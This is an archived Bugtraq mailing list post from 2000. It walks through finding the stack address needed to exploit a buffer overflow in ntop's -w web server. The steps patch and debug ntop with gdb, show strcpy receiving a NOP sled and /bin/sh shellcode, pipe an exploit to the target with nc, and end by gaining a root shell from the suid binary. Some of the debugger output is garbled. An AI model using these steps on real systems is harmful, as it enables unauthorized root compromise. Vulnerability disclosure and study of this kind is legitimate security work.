Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

How to find ntop -w esp value.

From: JW Oh <mat () IVNTECH COM>
Date: Thu, 26 Oct 2000 13:32:41 +0900
1. [on victim host] First modify ntop-1.2a1 src code to execute it with non-root priviledge. and compile it.
 ntop.c:362
    if((0 && (rFileName == NULL) && (getuid () && geteuid ()) || setuid (0)) ){

2. [on local host] do "tcpdump -w somefile" to get tcpdump file to feed ntop. copy it to victim host.

3. [on victim host] execute following with our modified ntop
    $ ./ntop -w 8080 -f somefile
    Warning: unable to read file '.ntop'. No security will be used!
    Waiting for HTTP connections on port 8080...

4. [on victim host] run gdb to attach our ntop process. and break at function returnHTTPPage.
    $ gdb ./ntop 2634
    (gdb) break returnHTTPPage
    Breakpoint 1 at 0x8051350
    (gdb) cont
    Continuing.
    [Switching to Thread 28851]


5. [on local host] execute exploit to victim host
    $ ./ntop-w-exp | nc victim 8080

5. [on victim host] gdb will stop at breakpoint returnHTTPPage. then you set break point on function strcpy, and then 
continue, then gdb will stop at strcpy breakpoint. The value of "dest=0xbefffb00" is the location of stack we will use 
as esp value.

Breakpoint 1, 0x8051350 in returnHTTPPage ()
(gdb) break strcpy
Breakpoint 2 at 0x400c842a: file ../sysdeps/generic/strcpy.c, line 33.
(gdb) cont
Continuing.

Breakpoint 2, strcpy (dest=0xbefffb00 "$爻쓩\017\005\b\b",
    src=0x8091dc1 '\220' <repeats 50 times>, 
"圍037^\211v\b1옌210F\a\211F\fs.013\211晋215N\b\215V\f儆2001蜜211鶩儆200汪mes>bin/sh\030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030豪스030"...)
 at ../sysdeps/generic/strcpy.c:33
(gdb) cont
Continuing.

 6. [on victim host] Now kill our ntop and run suid ntop.
   $ /usr/local/sbin/ntop -w 8080

 7. [on local host] modify esp value in ntop-w-exp.c and execute exploit. you can set offset with first argument to 
ntop-w-exp. I think offset must be minus value.
    $ ./ntop-w-exp | nc victim 8080
 8. [on victim host] You will get root shell.


=================================================
|                                               |
|               mat () hacksware com               |
|                                               |
=================================================
Previous By Date Next
Previous By Thread Next

Current thread: